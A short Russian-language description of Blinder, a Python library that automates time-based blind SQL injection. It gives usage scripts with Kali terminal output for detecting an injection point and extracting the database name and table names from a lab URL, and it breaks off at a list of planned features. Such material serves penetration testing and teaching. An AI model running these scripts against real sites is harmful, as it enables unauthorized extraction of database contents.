
Библиотека Python для автоматизации временной слепой SQL-инъекции
Blidner — это небольшая библиотека на Python для автоматизации временной слепой SQL-инъекции с использованием предопределённых запросов в качестве функций для автоматизации быстрой разработки PoC.
Вы можете установить Blinder с помощью следующей команды:
pip install blinder
Или загрузив исходный код и импортировав его вручную в ваш проект.
Чтобы использовать Blinder, вам нужно импортировать модуль Blinder, а затем начать использовать основные функции Blinder.
С помощью текущей версии Blinder вы можете:
Вы можете проверить наличие инъекции в URL-адресе с помощью следующего кода:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
Результат выполнения:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Вы можете получить имя базы данных с помощью следующего кода:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
И результат будет:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
Чтобы получить имена таблиц, вы можете использовать следующий код:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
И результат будет:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
Скоро будет добавлено множество функций, например: